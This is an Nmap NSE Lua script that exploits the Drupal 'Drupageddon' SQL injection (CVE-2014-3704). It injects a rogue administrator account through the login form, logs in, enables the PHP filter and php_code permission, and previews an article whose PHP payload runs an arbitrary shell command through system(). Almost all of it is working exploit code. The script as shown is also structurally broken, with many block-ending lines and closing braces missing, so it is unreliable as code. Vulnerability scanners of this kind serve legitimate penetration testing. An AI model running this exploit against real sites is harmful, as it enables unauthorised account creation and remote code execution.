431 lines
14 KiB
431 lines
14 KiB
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"
local url = require "url"
local vulns = require "vulns"
local openssl = require "openssl"
local rand = require "rand"
description = [[
Exploits CVE-2014-3704 also known as 'Drupageddon' in Drupal. Versions < 7.32
of Drupal core are known to be affected.
Vulnerability allows remote attackers to conduct SQL injection attacks via an
array containing crafted keys.
The script injects new Drupal administrator user via login form and then it
attempts to log in as this user to determine if target is vulnerable. If that's
the case following exploitation steps are performed:
* PHP filter module which allows embedded PHP code/snippets to be evaluated is enabled,
* permission to use PHP code for administrator users is set,
* new article which contains payload is created & previewed,
* cleanup: by default all DB records that were added/modified by the script are restored.
Vulnerability originally discovered by Stefan Horst from SektionEins.
Exploitation technique used to achieve RCE on the target is based on exploit/multi/http/drupal_drupageddon Metasploit module.
-- @see http-sql-injection.nse
-- @usage
-- nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.cmd="uname -a",http-vuln-cve2014-3704.uri="/drupal" <target>
-- nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.uri="/drupal",http-vuln-cve2014-3704.cleanup=false <target>
-- @output
-- 80/tcp open http syn-ack
-- | http-vuln-cve2014-3704:
-- | Drupal - pre Auth SQL Injection Vulnerability
-- | State: VULNERABLE (Exploitable)
-- | IDs: CVE:CVE-2014-3704
-- | The expandArguments function in the database abstraction API in
-- | Drupal core 7.x before 7.32 does not properly construct prepared
-- | statements, which allows remote attackers to conduct SQL injection
-- | attacks via an array containing crafted keys.
-- |
-- | Disclosure date: 2014-10-15
-- | Exploit results:
-- | Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux
-- | References:
-- | https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
-- | https://www.drupal.org/SA-CORE-2014-005
-- | http://www.securityfocus.com/bid/70595
-- |_ https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3704
-- @args http-vuln-cve2014-3704.uri Drupal root directory on the website. Default: /
-- @args http-vuln-cve2014-3704.cmd Shell command to execute. Default: nil
-- @args http-vuln-cve2014-3704.cleanup Indicates whether cleanup (removing DB
-- records that was added/modified during
-- exploitation phase) will be done.
-- Default: true
author = "Mariusz Ziulek <mzet()owasp org>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive", "exploit"}
portrule = shortport.http
--- Appends a new multipart/form-data part to a table
local function multipart_append_data(r, k, data, extra)
r[#r + 1] = string.format("content-disposition: form-data; name=\"%s\"", k)
if extra.filename then
r[#r + 1] = string.format("; filename=\"%s\"", extra.filename)
if extra.content_type then
r[#r + 1] = string.format("\r\ncontent-type: %s", extra.content_type)
if extra.content_transfer_encoding then
r[#r + 1] = string.format("\r\ncontent-transfer-encoding: %s", extra.content_transfer_encoding)
r[#r + 1] = string.format("\r\n\r\n%s\r\n", data)
--- Creates multipart/form-data message as defined in RFC 2388
local function multipart_build_body(content, boundary)
local r = {}
local k, v
for k, v in pairs(content) do
r[#r + 1] = string.format("--%s\r\n", boundary)
if type(v) == "string" then
multipart_append_data(r, k, v, {})
elseif type(v) == "table" then
if v.data == nil then return nil end
local extra = {
filename = v.filename or v.name,
content_type = v.content_type or v.mimetype or "application/octet-stream",
content_transfer_encoding = v.content_transfer_encoding or "binary",
multipart_append_data(r, k, v.data, extra)
return nil
r[#r + 1] = string.format("--%s--\r\n", boundary)
return table.concat(r)
local function extract_CSRFtoken(content)
local pattern = 'name="form_token" value="(.-)"'
local value = string.match(content, pattern)
return value
local function itoa64(index)
local itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
return string.sub(itoa64, index + 1, index + 1)
local function phpass_encode64(input)
local count = #input + 1
local out = {}
local cur = 1
while cur < count do
local value = string.byte(input, cur)
cur = cur + 1
table.insert(out, itoa64(value & 0x3f))
if cur < count then
value = value | (string.byte(input, cur) << 8)
table.insert(out, itoa64((value >> 6) & 0x3f))
if cur >= count then
cur = cur + 1
if cur < count then
value = value | (string.byte(input, cur) << 16)
table.insert(out, itoa64((value >> 12) & 0x3f))
if cur >= count then
cur = cur + 1
table.insert(out, itoa64((value >> 18) & 0x3f))
return table.concat(out)
local function gen_passwd_hash(passwd)
local iter = 15
local iter_char = itoa64(iter)
local iter_count = 1<<iter
local salt = rand.random_alpha(8)
local md5 = openssl.md5(salt .. passwd)
for i = 1, iter_count do
md5 = openssl.md5(md5 .. passwd)
local dgst = phpass_encode64(md5)
local h = '$P$' .. iter_char .. salt .. string.sub(dgst, 0, 22)
return h
local function do_sql_query(host, port, uri, user)
local adminRole = 'administrator'
local sql_user
local sql_admin
local passwd
local email
local passHash
local query
if user == nil then
user = rand.random_alpha(10)
passwd = rand.random_alpha(10)
passHash = gen_passwd_hash(passwd)
email = rand.random_alpha(8) .. '@' .. rand.random_alpha(5) .. '.' .. rand.random_alpha(3)
stdnse.debug(1, string.format("adding admin user (username: '%s'; passwd: '%s')", user, passwd))
sql_user = url.escape("insert into users (uid,name,pass,mail,status) select max(uid)+1,'" .. user .. "','" .. passHash .. "','" .. email .. "',1 from users;")
sql_admin = url.escape("insert into users_roles (uid, rid) VALUES ((select uid from users where name='" .. user .. "'), (select rid from role where name = '" .. adminRole .. "'));")
query = sql_user .. sql_admin
stdnse.debug(1, string.format("removing admin user (username: '%s')", user))
sql_user = url.escape("delete from users where name='" .. user .. "';")
sql_admin = url.escape("delete from users_roles where uid=(select uid from users where name='" .. user .. "');")
query = sql_admin .. sql_user
local r = "name[0;" .. query .. "#%20%20]=" .. rand.random_alpha(10) .. "&name[0]=" .. rand.random_alpha(10) .. "&pass=" .. rand.random_alpha(10) .. "&form_id=user_login&op=Log+in"
local opt = {
header = {
['Content-Type'] = "application/x-www-form-urlencoded"
local res = http.post(host, port, uri .. "?q=/user/login", opt, nil, r)
if string.match(res.body, "includes[\\/]database[\\/]database%.inc") and string.match(res.body, "addcslashes%(%)") then
return user, passwd
local function set_php_filter(host, port, uri, session, disable)
-- enable PHP filter
if not disable then
stdnse.debug(1, "enabling PHP filter module")
stdnse.debug(1, "disabling PHP filter module")
local opt = {}
opt['cookies'] = session.name ..'='.. session.value
local res = http.get(host, port, uri .. "?q=/admin/modules", opt)
if res == nil then return nil end
local csrfToken = extract_CSRFtoken(res.body)
local enabledModulesPattern = 'name="([^"]*)" value="1" checked="checked" class="form%-checkbox"'
local data = {}
for m in string.gmatch(res.body, enabledModulesPattern) do
data[m] = 1
if disable and m == 'modules[Core][php][enable]' then
data[m] = nil
if not disable then
data['modules[Core][php][enable]'] = 1
data['form_token'] = csrfToken
data['form_id'] = 'system_modules'
data['op'] = 'Save configuration'
res = http.post(host, port, uri .. "?q=/admin/modules/list/confirm", opt, nil, data)
if res == nil then return nil end
return true
local function set_permission(host, port, uri, session, disable)
-- allow Administrator to use php_code
if not disable then
stdnse.debug(1, "setting permissions for PHP filter module")
stdnse.debug(1, "restoring permissions for PHP filter module")
local opt = {}
opt['cookies'] = session.name ..'='.. session.value
local res = http.get(host, port, uri .. "?q=/admin/people/permissions", opt)
if res == nil then return nil end
local csrfToken = extract_CSRFtoken(res.body)
local enabledPermsRegex = 'name="([^"]*)" value="([^"]*)" checked="checked"'
local data = {}
for key, value in string.gmatch(res.body, enabledPermsRegex) do
data[key] = value
if disable and key == '3[use text format php_code]' then
data[key] = nil
if not disable then
data['3[use text format php_code]'] = 'use text format php_code'
data['form_token'] = csrfToken
data['form_id'] = 'user_admin_permissions'
data['op'] = 'Save permissions'
res = http.post(host, port, uri .. "?q=/admin/people/permissions", opt, nil, data)
if res == nil then return nil end
return true
local function trigger_exploit(host, port, uri, session, cmd)
local opt = {}
opt['cookies'] = session.name ..'='.. session.value
-- add new Content page & trigger RCE
stdnse.debug(1, string.format("%s", "creating new article page with planted payload"))
local res = http.get(host, port, uri .. "?q=/node/add/article", opt)
if res == nil then return nil end
local csrfToken = extract_CSRFtoken(res.body)
stdnse.debug(1, string.format("%s", "calling preview article page & triggering exploit"))
local pattern = '"' .. rand.random_alpha(5)
local payload = "<?php echo '" .. pattern .. " '; system('" .. cmd .. "'); echo '".. pattern .. " '; ?>"
local boundary = rand.random_alpha(16)
opt['header'] = {}
opt['header']["Content-Type"] = "multipart/form-data" .. "; boundary=" .. boundary
local files = {
['title'] = 'title',
['form_id'] = 'article_node_form',
['form_token'] = csrfToken,
['body[und][0][value]'] = payload,
['body[und][0][format]'] = 'php_code',
['op'] = 'Preview',
local body = multipart_build_body(files, boundary)
res = http.post(host, port, uri .. "?q=/node/add/article", opt, nil, body)
if res == nil then return nil end
return res.body, pattern
action = function(host, port)
local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or '/'
local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil
local cleanup = nil
if stdnse.get_script_args(SCRIPT_NAME..".cleanup") == "false" then
cleanup = "false"
local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
local vuln = {
title = 'Drupal - pre Auth SQL Injection Vulnerability',
state = vulns.STATE.NOT_VULN,
description = [[
The expandArguments function in the database abstraction API in
Drupal core 7.x before 7.32 does not properly construct prepared
statements, which allows remote attackers to conduct SQL injection
attacks via an array containing crafted keys.
IDS = {CVE = 'CVE-2014-3704'},
references = {
dates = {
disclosure = {year = '2014', month = '10', day = '15'},
local user, passwd = do_sql_query(host, port, uri, nil)
if user == nil or passwd == nil then
return vulnReport:make_output(vuln)
stdnse.debug(1, string.format("logging in as admin user (username: '%s'; passwd: '%s')", user, passwd))
vuln.state = vulns.STATE.EXPLOIT
local data = {
['name'] = user,
['pass'] = passwd,
['form_id'] = 'user_login',
['op'] = 'Log in',
local res = http.post(host, port, uri .. "?q=/user/login", nil, nil, data)
if res.status == 302 and res.cookies[1].name ~= nil then
stdnse.debug(1, string.format("logged in as admin user (username: '%s'; passwd: '%s'). Target is vulnerable.", user, passwd))
if cmd ~= nil then
local session = {}
session.name = res.cookies[1].name
session.value = res.cookies[1].value
set_php_filter(host, port, uri, session, false)
set_permission(host, port, uri, session, false)
local resp_content, pattern = trigger_exploit(host, port, uri, session, cmd)
local cmdOut = nil
for m in string.gmatch(resp_content, pattern .. '([^"]*)' .. pattern) do
cmdOut = m
if cmdOut ~= nil then
vuln.exploit_results = cmdOut
-- cleanup: restore permission & disable php filter module
if cleanup == nil then
set_permission(host, port, uri, session, true)
set_php_filter(host, port, uri, session, true)
vuln.state = vulns.STATE.LIKELY_VULN
vuln.check_results = "Account created but unable to log in."
-- cleanup: remove admin user
if cleanup == nil then
do_sql_query(host, port, uri, user)
return vulnReport:make_output(vuln)